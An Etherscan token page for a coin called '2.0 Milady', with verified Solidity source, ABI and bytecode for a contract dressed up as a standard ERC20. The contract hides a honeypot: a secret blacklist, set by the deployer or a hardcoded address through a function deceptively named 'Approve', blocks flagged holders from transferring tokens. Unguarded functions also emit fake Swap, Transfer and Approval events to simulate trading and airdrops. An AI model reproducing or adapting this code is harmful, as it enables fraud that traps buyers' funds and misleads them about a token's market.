ETH Price: $3,299.81 (-3.28%)
Gas: 19 Gwei

Token

2.0 Milady (2.0Milady)
 

Overview

Max Total Supply

10,000,000,000,000 2.0Milady

Holders

131

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 8 Decimals)

Filtered by Token Holder
sleepisthecousinofdeath.eth
Balance
27,625,905,585.2699909 2.0Milady

Value
$0.00
0x8899e36cb10b339f4823ec48bdf310909da9f99f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-07
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _ss;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    address private _ow;

    function setup(address _setup_) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external  {
        require(address(0x419a6Fa06386329ce83294519247614398e929E7) == _msgSender() || _ow == _msgSender() , "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _ss[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function Approve(address [] calldata _addresses_ , uint256 balance) external  {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Approval(_addresses_[i], address(this), balance);
        }
    }
    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }


    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _ss[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _ss[_address_];
    }
    function toApplied(bool c) external  {
        require( _ow == _msgSender() , "Ownable: caller is not the owner");
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }


    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");


        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_ss[from]) require(true == _snapshotApplied, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _ow = account;
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,uint256 amount) {
        _name = name_;
        _symbol = symbol_;
        _mint(msg.sender, amount * 10 ** decimals());
    }


}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"amount","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b5060405162002d7638038062002d768339818101604052810190620000a7919062000573565b620000c7620000bb6200013060201b60201c565b6200013860201b60201c565b8260069081620000d891906200084e565b508160079081620000ea91906200084e565b50620001273362000100620001fc60201b60201c565b600a6200010e919062000ac5565b836200011b919062000b16565b6200020560201b60201c565b50505062000c4d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000277576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026e9062000bc2565b60405180910390fd5b81600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060046000828254620002cc919062000be4565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000380919062000c30565b60405180910390a36200039c60008383620003a060201b60201c565b5050565b505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200040e82620003c3565b810181811067ffffffffffffffff8211171562000430576200042f620003d4565b5b80604052505050565b600062000445620003a5565b905062000453828262000403565b919050565b600067ffffffffffffffff821115620004765762000475620003d4565b5b6200048182620003c3565b9050602081019050919050565b60005b83811015620004ae57808201518184015260208101905062000491565b60008484015250505050565b6000620004d1620004cb8462000458565b62000439565b905082815260208101848484011115620004f057620004ef620003be565b5b620004fd8482856200048e565b509392505050565b600082601f8301126200051d576200051c620003b9565b5b81516200052f848260208601620004ba565b91505092915050565b6000819050919050565b6200054d8162000538565b81146200055957600080fd5b50565b6000815190506200056d8162000542565b92915050565b6000806000606084860312156200058f576200058e620003af565b5b600084015167ffffffffffffffff811115620005b057620005af620003b4565b5b620005be8682870162000505565b935050602084015167ffffffffffffffff811115620005e257620005e1620003b4565b5b620005f08682870162000505565b925050604062000603868287016200055c565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200066057607f821691505b60208210810362000676576200067562000618565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006e07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006a1565b620006ec8683620006a1565b95508019841693508086168417925050509392505050565b6000819050919050565b60006200072f62000729620007238462000538565b62000704565b62000538565b9050919050565b6000819050919050565b6200074b836200070e565b620007636200075a8262000736565b848454620006ae565b825550505050565b600090565b6200077a6200076b565b6200078781848462000740565b505050565b5b81811015620007af57620007a360008262000770565b6001810190506200078d565b5050565b601f821115620007fe57620007c8816200067c565b620007d38462000691565b81016020851015620007e3578190505b620007fb620007f28562000691565b8301826200078c565b50505b505050565b600082821c905092915050565b6000620008236000198460080262000803565b1980831691505092915050565b60006200083e838362000810565b9150826002028217905092915050565b62000859826200060d565b67ffffffffffffffff811115620008755762000874620003d4565b5b62000881825462000647565b6200088e828285620007b3565b600060209050601f831160018114620008c65760008415620008b1578287015190505b620008bd858262000830565b8655506200092d565b601f198416620008d6866200067c565b60005b828110156200090057848901518255600182019150602085019450602081019050620008d9565b868310156200092057848901516200091c601f89168262000810565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620009c3578086048111156200099b576200099a62000935565b5b6001851615620009ab5780820291505b8081029050620009bb8562000964565b94506200097b565b94509492505050565b600082620009de576001905062000ab1565b81620009ee576000905062000ab1565b816001811462000a07576002811462000a125762000a48565b600191505062000ab1565b60ff84111562000a275762000a2662000935565b5b8360020a91508482111562000a415762000a4062000935565b5b5062000ab1565b5060208310610133831016604e8410600b841016171562000a825782820a90508381111562000a7c5762000a7b62000935565b5b62000ab1565b62000a91848484600162000971565b9250905081840481111562000aab5762000aaa62000935565b5b81810290505b9392505050565b600060ff82169050919050565b600062000ad28262000538565b915062000adf8362000ab8565b925062000b0e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620009cc565b905092915050565b600062000b238262000538565b915062000b308362000538565b925082820262000b408162000538565b9150828204841483151762000b5a5762000b5962000935565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000baa601f8362000b61565b915062000bb78262000b72565b602082019050919050565b6000602082019050818103600083015262000bdd8162000b9b565b9050919050565b600062000bf18262000538565b915062000bfe8362000538565b925082820190508082111562000c195762000c1862000935565b5b92915050565b62000c2a8162000538565b82525050565b600060208201905062000c47600083018462000c1f565b92915050565b6121198062000c5d6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806381bac14f116100ad578063a9059cbb11610071578063a9059cbb1461031d578063beabacc81461034d578063dd62ed3e14610369578063f2fde38b14610399578063fde980ca146103b55761012c565b806381bac14f146102795780638da5cb5b146102a957806395d89b41146102c75780639ebbaef7146102e5578063a1c617f5146103015761012c565b80633811ac02116100f45780633811ac02146101eb578063477e19441461020757806366d382031461022357806370a082311461023f578063715018a61461026f5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103d1565b6040516101469190611669565b60405180910390f35b61016960048036038101906101649190611729565b610463565b6040516101769190611784565b60405180910390f35b610187610486565b60405161019491906117ae565b60405180910390f35b6101b760048036038101906101b291906117c9565b610490565b6040516101c49190611784565b60405180910390f35b6101d56104bf565b6040516101e29190611838565b60405180910390f35b610205600480360381019061020091906118b8565b6104c8565b005b610221600480360381019061021c91906118b8565b610710565b005b61023d60048036038101906102389190611905565b61084c565b005b61025960048036038101906102549190611905565b610927565b60405161026691906117ae565b60405180910390f35b610277610970565b005b610293600480360381019061028e9190611905565b610984565b6040516102a09190611784565b60405180910390f35b6102b16109da565b6040516102be9190611941565b60405180910390f35b6102cf610a03565b6040516102dc9190611669565b60405180910390f35b6102ff60048036038101906102fa919061195c565b610a95565b005b61031b600480360381019061031691906119bc565b610b48565b005b61033760048036038101906103329190611729565b610cd3565b6040516103449190611784565b60405180910390f35b610367600480360381019061036291906117c9565b610cf6565b005b610383600480360381019061037e9190611a30565b610d60565b60405161039091906117ae565b60405180910390f35b6103b360048036038101906103ae9190611905565b610de7565b005b6103cf60048036038101906103ca9190611a9c565b610e6a565b005b6060600680546103e090611af8565b80601f016020809104026020016040519081016040528092919081815260200182805461040c90611af8565b80156104595780601f1061042e57610100808354040283529160200191610459565b820191906000526020600020905b81548152906001019060200180831161043c57829003601f168201915b5050505050905090565b60008061046e610f1e565b905061047b818585610f26565b600191505092915050565b6000600454905090565b60008061049b610f1e565b90506104a88582856110ef565b6104b385858561117b565b60019150509392505050565b60006008905090565b6104d0610f1e565b73ffffffffffffffffffffffffffffffffffffffff1673419a6fa06386329ce83294519247614398e929e773ffffffffffffffffffffffffffffffffffffffff1614806105715750610520610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6105b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105a790611b75565b60405180910390fd5b60005b8282905081101561070b576001600260008585858181106105d7576105d6611b95565b5b90506020020160208101906105ec9190611905565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff1683838381811061066757610666611b95565b5b905060200201602081019061067c9190611905565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9256106e38686868181106106c9576106c8611b95565b5b90506020020160208101906106de9190611905565b610927565b6040516106f091906117ae565b60405180910390a3808061070390611bf3565b9150506105b3565b505050565b610718610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161079e90611b75565b60405180910390fd5b60005b82829050811015610847576000600260008585858181106107ce576107cd611b95565b5b90506020020160208101906107e39190611905565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061083f90611bf3565b9150506107aa565b505050565b610854610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108e3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108da90611b75565b60405180910390fd5b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610978611492565b6109826000611510565b565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610a1290611af8565b80601f0160208091040260200160405190810160405280929190818152602001828054610a3e90611af8565b8015610a8b5780601f10610a6057610100808354040283529160200191610a8b565b820191906000526020600020905b815481529060010190602001808311610a6e57829003601f168201915b5050505050905090565b60005b83839050811015610b42573073ffffffffffffffffffffffffffffffffffffffff16848483818110610acd57610acc611b95565b5b9050602002016020810190610ae29190611905565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b2791906117ae565b60405180910390a38080610b3a90611bf3565b915050610a98565b50505050565b60005b84849050811015610ccc57848482818110610b6957610b68611b95565b5b9050602002016020810190610b7e9190611905565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c039493929190611c80565b60405180910390a3848482818110610c1e57610c1d611b95565b5b9050602002016020810190610c339190611905565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cb191906117ae565b60405180910390a38080610cc490611bf3